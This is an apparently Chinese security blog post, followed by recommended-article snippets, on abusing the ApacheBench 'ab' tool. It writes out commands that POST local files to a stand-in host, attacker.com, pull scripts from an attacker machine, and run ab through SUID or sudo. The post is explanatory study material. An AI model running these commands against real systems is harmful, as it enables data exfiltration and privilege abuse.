本地权限绕过之ab命令

最新推荐文章于 2024-12-04 17:59:34 发布
最新推荐文章于 2024-12-04 17:59:34 发布
阅读量405 收藏
点赞数
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50424796/article/details/126571513
版权

一、ab命令概述(Web服务器性能测试)

二、本地绕过的四种基本方式

2.1文件上传(File upload)

2.2 文件下载(File download)

2.3 SUID

2.4 Sudo

一、ab命令概述

ab代表“Apache Bench”,该命令是Apache超文本传输协议(HTTP)服务器性能测试工具,可以使用该命令来测试当前所安装的Apache服务器的运行性能,显示Apache服务器每秒可以处理多少个HTTP请求。(补充:ab命令是Apache服务器自带的一款功能强大的测试工具,所属包为apache2-utils)
Debian系统命令行下载:apt install apache2-utils
Centos系统命令行下载: yum -y install httpd-tools
下载完成后输入ab -V检查是否成功下载和当前版本

This is ApacheBench, Version 2.3 <$Revision: 1843412 $>
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Licensed to The Apache Software Foundation, http://www.apache.org/

二、本地绕过的四种基本方式

2.1 文件上传

基本原理如下图所示
在这里插入图片描述
一般来说,存在文件上传漏洞的网站都有类似的交互框,即客户输入一些内容,服务器根据输入的内容在本地或其它服务器上进行查找,最后返回用户需要的内容。
ab命令绕过的骚操作

# Upload local file via HTTP POST request.通过HTTP协议的POST请求上传文件
URL=http://attacker.com/    # 要进行文件上传的网站(一般是靶机)
LFILE=file_to_send    # 本地要上传的文件(一般是PHP反弹脚本)
ab -p $LFILE $URL     # -p参数(上传包含了POST数据的文件)

2.2文件下载

有的时候,在进入后台服务器的时候,可能需要从攻击机上下载一些搜集信息的脚本,除了curl、apt 、wget、 yum等常见下载命令外,ab有的时候也会是一个不错的选择。

# 使用前提:攻击机提前开启服务器:python -m SimpleHTTPServer 8080
URL=http://attacker.com/file_to_download   # attacker.com=攻击机IP
ab -v2 $URL  -v参数,设置显示返回信息的详细程度,
# 2显示警告信息,3显示响应代码(404、303等),4显示头部信息

2.3 SUID

suid的特殊作用:可以基于二进制命令绕过基础权限体系,比如可以修改没有权限的文件。

# 假设:服务器禁止上传文件或者入侵进后台服务器后,无法通过脚本反弹shell
# 那么该命令就十分有用
# Upload local file via HTTP POST request.
# 通过HTTP POST请求上传本地文件
sudo install -m =xs $(which ab) .

URL=http://attacker.com/
LFILE=file_to_send
./ab -p $LFILE $URL

2.4 Sudo

如果sudo允许二进制文件作为超级用户运行,它可以提升权限,并可用于访问文件系统、升级或维护特权访问。
通过HTTP POST请求上传本地文件。
URL=http://attacker.com/
LFILE=file_to_send
sudo ab -p $LFILE $URL

补充基础用法:测试远程apache主机(这才是诞生的主要原因)
假设你想同步并发模拟10个点击链接的请求并执行100次,可以使用参数“-n”和“-c”来指定,具体命令如下:

-n 同时链接请求数(一个网站同时被多个用户点击的次数)  
-c 执行次数(服务器反应并且执行的次数)
ab -c 10 -n 100 "http://editor.csdn.net/"

参考文章:https://gtfobins.github.io/gtfobins/ab/
本研究仅供学习研究,请勿用于非法用途。

单身bug
关注
【愚公系列】2023年05月 Web渗透测试之权限绕过攻击
时光隧道
08-25 5万+
权限绕过攻击是一种攻击技术,在这种攻击中,攻击者试图通过欺骗系统或者其他授权实体,绕过安全控制以获得对某一系统、网络、应用或者数据的未授权访问。攻击者通常使用各种恶意Web应用程序来绕过安全控制以获得攻击目标中的敏感信息。
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
ab命令深入解析:ApacheBench性能测试工具
红衣大叔
10-18 1493
ab命令全称为ApacheBench,是一个小巧而强大的性能测试工具。它不仅可以对Apache服务器进行网站访问压力测试,还可以测试其他类型的服务器,如Nginx、Tomcat、IIS等。ab命令会创建多个并发访问线程,模拟多个访问者同时对某一URL地址进行访问,从而对目标服务器造成负载压力。ab命令是一个简单而强大的性能测试工具,通过模拟多个并发请求,可以测试目标服务器的负载能力和性能表现。本文深入解析了ab命令的使用方法、参数选项及性能评估指标,帮助开发者更好地进行性能测试。
php本地访问绕过,手动访问PHP-FPM的/状态页面(绕过Apache)
weixin_39777163的博客
03-20 191
要加载/ status页面,您必须设置某些环境变量,特别是:SCRIPT_NAME,SCRIPT_FILENAME,QUERY_STRING和REQUEST_METHOD.您不需要DOCUMENT_ROOT(即使是正常请求).在php-fpm配置集(或取消注释)的正确池(它不是全局设置)下:pm.status_path = /status然后运行(替换PORT):SCRIPT_NAME=/stat...
Sun Java System本地绕过的漏洞
java专栏
05-25 517
google_ad_client = "pub-8800625213955058";/* 336x280, 创建于 07-11-21 */google_ad_slot = "0989131976";google_ad_width = 336;google_ad_height = 280;//<script type="text/java
ab命令基本使用
qq_43076479的博客
04-30 849
linux下安装ab压力测试工具及ab命令详解 yum -y install httpd-tools ab -v 查看ab版本 ab –help ab -n1000 -c 10 http://www.91cnm.com/ http://www.91cnm.com/是我的小网站挂在虚拟主机上的 ,-n访问1000次, -c并发10个 ab压力测试返回报文内容详解: Server ...
linux命令——ab
weixin_73220988的博客
12-04 1052
Apache服务器的性能测试工具。
【CVE-2018-11759】Apache mod_jk访问控制的绕过漏洞复现
Blog of Jaoing
04-24 4631
Apache Tomcat JK(mod_jk)Connector是美国阿帕奇(Apache)软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块,用以为Apache或IIS服务器提供处理JSP/Servlet的能力。 由于httpd和Tomcat在路径处理规范上存在差异,因此可以绕过Apache mod_jk Connector 1.2.0版本到1.2.44版......
Docker 数据管理 —— 介绍及创建数据卷(data volumes)—— 容器内数据映射到本地主机环境(使用 docker volume命令 或 使用 dockerfile 构建数据卷)
郑泽林
04-21 1938
文章目录前言:1、数据卷介绍:2、使用 docker volume 创建数据卷(方法1)①、docker volume command 介绍:②、docker volume 子命令介绍:③、create a local data volume④、运行容器时,绑定数据卷⑤、测试数据卷内容的更新速度及权限:⑥、更改 rw(读写) 权限为 ro(只读)⑦、其他 docker volume command...
文件包含及代码执行及命令执行
j1044957016的博客
06-01 2876
文件包含,代码执行,命令执行常见的函数,以及如何绕过过滤
34C3 CTF Web题 extract0r Writeup (软链接实现任意读文件/目录+SSRF绕过内网ip黑名单+Gopher攻击MySQL+zip文件构造)
热门推荐
keyball123的博客
03-28 1万+
extract0r – A web challenge from hxp 34C3 CTF https://ctftime.org/event/544 题目部署 本地搭建: https://github.com/shimmeris/CTF-Web-Challenges/tree/master/SSRF/34c3-2017-extract0r 在34c3-2017-extract0r目录下执...
利用http协议绕过waf
tomyyyyy
10-28 602
利用http协议绕过waf 目录利用http协议绕过waf分块传输绕过waf畸形包绕过协议覆盖分块传输绕过waf 先在数据包中添加Transfer-Encoding: chunked 数字代表下一列字符所占位数,最后需要用0独占一行表示结束,结尾需要两个回车 在头部加入 Transfer-Encoding: chunked 之后,就代表这个报文采用了分块编码。这时,post请求报文中的数据部...
ab的简介与基本使用
qq_24427977的博客
12-09 816
ab,压测
使用ab命令进行压力测试
m0_67505824的博客
03-16 1万+
ab是Apache自带的压力测试工具。ab非常实用,它不仅可以对Apache服务器进行网站访问压力测试,也可以对其它类型的服务器进行压力测试。比如Nginx、Tomcat、IIS等。 下面我们开始介绍有关ab命令的使用: 1、ab的原理 2、ab的安装 3、ab参数说明 4、ab性能指标 5、ab实际使用 一、ab的原理 ab是apachebench命令的缩写。 ab的原理:ab命令会创建多个并发访问线程,模拟多个访问者同时对某一URL地址进行访问。它的测试目标是基于URL的,因此,它既可以用来测试a
黑客10种绕过防火墙方法
03-20 8677
SSL/TLS隧道:SSL(Secure Sockets Layer)/TLS(Transport Layer Security)隧道是通过SSL/TLS协议建立的安全通信隧道,用于在客户端和服务器之间建立加密的通信连接。在分段攻击中,攻击者通过发送特制的网络数据包,利用目标系统对数据包的处理逻辑漏洞,实现对目标系统的攻击。中间人攻击:攻击者将自己的IP地址伪装成受害者或者目标服务器的IP地址,从而使得通信的两端都误以为与对方直接通信,而实际上数据包都经过了攻击者的中间节点,攻击者窃取或篡改通信内容。
a-upload文件夹上传
zyqgt960812的博客
07-16 7448
项目开发时遇到了一个需要使用upload组件上传文件夹的需求 总的来说选中文件夹之后还是单个文件进行上传的本质 需要清楚的是当上传多个文件的时候(比如10个文件10),upload组件的是先执行10次beforeUpload方法 再执行十次上传方法,完整代码如下; 我的需求是在完成十次文件上传后进行一次表格数据刷新和上传成功的提示; //template中的代码 <a-upload name="file" :showUploadList="false" :multipl.
性能测试工具 ab(Apache Bench)使用详解
jkzyx123的博客
04-07 1335
性能测试工具 ab(Apache Bench)使用详解
Ab工具基本使用
diaochuangqi7487的博客
04-24 538
Ab简介 ab是apache自带的压力测试工具,ab是apachebench命令的缩写。 ab不仅可以对apache服务器进行网站访问压力测试,也可以对或其它类型的服务器进行压力测试。 ab是一个httpd自带的很好用的压力测试工具,ab命令会创建多个并发访问线程,模拟多个访问者同时对某一URL地址进行访问。 可以用来测试apache的负载压力,也可以 用来测试nginx、lig...
WEB相关工具(wget、curl、ab
十七拾的博客
02-22 1227
本文主要介绍了WEB相关工具(wget、curl、ab命令,希望对你有帮助!
(.venv) PS E:\project\hello-main\hello-main\Text-to-image-synthesis-with-AttnGAN\.venv\Scripts> pip install pyyaml==5.4.1 Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple Collecting pyyaml==5.4.1 Using cached https://pypi.tuna.tsinghua.edu.cn/packages/a0/a4/d63f2d7597e1a4b55aa3b4d6c5b029991d3b824b5bd331af8d4ab1ed687d/PyYAML-5.4.1.tar.gz (175 kB) Installing build dependencies ... done Getting requirements to build wheel ... error error: subprocess-exited-with-error × Getting requirements to build wheel did not run successfully. │ exit code: 1 ╰─> [67 lines of output] C:\Users\Lenovo\AppData\Local\Temp\pip-build-env-39xroia_\overlay\Lib\site-packages\setuptools\dist.py:759: SetuptoolsDeprecationWarning: License classifiers are deprecated. !! ******************************************************************************** Please consider removing the following c
最新发布
04-17
<think>好的,我现在需要解决用户在安装PyYAML 5.4.1时遇到的错误:“Getting requirements to build wheel did not run successfully”。用户之前提到了其他安装问题,比如docker-compose的kwargs_from_env错误和NumPy在32位环境下的版本问题,可能这些经验对当前问题有帮助。 首先,用户想安装PyYAML 5.4.1版本,但遇到了构建wheel时的依赖问题。可能的原因包括缺少构建工具、Python版本不兼容、系统依赖项缺失,或者网络问题。需要分步骤排查。 1. **检查Python版本和构建工具**:PyYAML可能需要特定版本的Python。用户之前使用的是Python 3.8.8,而PyYAML 5.4.1可能要求更高或兼容的版本。同时,需要确保setuptools、wheel和pip都是最新的,以便正确构建。 2. **系统依赖项**:在Linux上,可能需要安装libyaml-dev来支持C扩展,从而加速库的运行。Windows上可能需要C++构建工具,比如Visual Studio的构建工具。 3. **使用预编译的wheel**:用户可能尝试从源码编译时失败,可以寻找预编译的wheel文件,特别是对于Windows 32位环境,可能存在兼容性问题。通过指定--prefer-binary选项强制pip使用二进制包。 4. **使用conda安装**:如果pip安装失败,conda可能提供预编译的版本,绕过构建步骤。 5. **降级pip版本**:有时新版本的pip可能与旧包不兼容,降级pip可能解决问题。 6. **手动下载并安装**:从PyPI下载whl文件手动安装,适用于网络问题或特定架构需求。 需要参考用户之前的经验,比如指定版本号解决NumPy的问题,可能这里也需要明确版本和构建选项。同时用户之前提到的虚拟环境,需确认是否在正确的环境中操作,避免权限问题。 可能的解决方案步骤:更新构建工具,安装系统依赖,使用预编译wheel,换用conda,降级pip,手动安装等。需要逐一尝试,并给出具体命令示例。同时提醒用户注意虚拟环境和权限问题,比如使用--user选项或管理员权限。</think>--- ### 安装PyYAML 5.4.1时解决构建错误的完整方案 #### 一、问题背景 安装旧版本PyYAML(如5.4.1)时出现`Getting requirements to build wheel did not run successfully`错误,通常是由于**依赖缺失**或**构建环境配置不当**引起。以下是分步修复方案: --- ### 二、核心修复步骤 #### 步骤1:升级构建工具 确保`setuptools`、`wheel`和`pip`为最新版本: ```bash pip install --upgrade setuptools wheel pip ``` **作用**:修复旧版本工具链与新/旧包兼容性问题[^1]。 --- #### 步骤2:安装系统级依赖 根据操作系统补充必要依赖: - **Linux**(需libyaml开发文件): ```bash sudo apt-get install libyaml-dev # Debian/Ubuntu sudo yum install libyaml-devel # CentOS/RHEL ``` - **Windows**: 安装[Microsoft C++ Build Tools](https://visualstudio.microsoft.com/visual-cpp-build-tools/),勾选“C++桌面开发”组件。 --- #### 步骤3:强制使用预编译二进制(关键) 指定`--prefer-binary`参数避免源码编译: ```bash pip install pyyaml==5.4.1 --prefer-binary ``` **原理**:直接下载预编译的`.whl`文件,跳过可能失败的构建步骤[^2]。 --- #### 步骤4:使用conda安装(替代方案) 若pip持续失败,改用conda安装: ```bash conda install pyyaml=5.4.1 ``` **优势**:Conda仓库中可能包含适配当前系统的预编译版本。 --- #### 步骤5:降级pip版本 某些旧包与新版本pip存在兼容性问题: ```bash pip install pip==21.3.1 # 降级到兼容旧包的版本 pip install pyyaml==5.4.1 ``` --- ### 三、进阶排查 #### 方案1:手动下载whl文件 1. 访问[PyYAML的PyPI页面](https://pypi.org/project/PyYAML/5.4.1/#files) 2. 根据系统下载对应的`.whl`文件(如`PyYAML-5.4.1-cp38-cp38-win32.whl`) 3. 本地安装: ```bash pip install PyYAML-5.4.1-cp38-cp38-win32.whl ``` #### 方案2:禁用C扩展(兼容性牺牲) 若无需高性能YAML解析,可禁用LibYAML绑定: ```bash export PYYAML_FORCE_PURE=1 # Linux/macOS set PYYAML_FORCE_PURE=1 # Windows pip install pyyaml==5.4.1 ``` --- ### 四、环境验证 安装完成后检查版本及功能: ```python import yaml print(yaml.__version__) # 应输出5.4.1 print(yaml.dump({"test": "data"})) # 验证基础功能 ``` --- ### 五、关联问题参考 若出现其他依赖错误(如用户提到的`kwargs_from_env()`问题),可参考以下原则: 1. **版本锁定**:如用户安装NumPy时通过指定`numpy==1.23.0`解决兼容性问题[^3] 2. **虚拟环境隔离**:确保操作在正确的Python环境(如32位虚拟环境)中执行 ```bash python -m venv --copies 32bit_venv # 明确创建纯净环境 ``` --- ### 六、错误日志分析模板 若上述方案均失败,收集完整错误日志后排查: ```bash pip install pyyaml==5.4.1 --no-cache-dir --verbose > install_log.txt 2>&1 ``` 重点检查日志中以下部分: - `Building wheel for pyyaml (PEP 517)` - `Failed building wheel for pyyaml` - `error: subprocess-exited-with-error` --- --相关问题--: 1. 如何修复Python中缺失`libyaml`导致的C扩展编译错误? 2. 为什么Windows环境下安装Python包时需要C++构建工具? 3. 如何为旧版Python创建兼容的虚拟环境?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值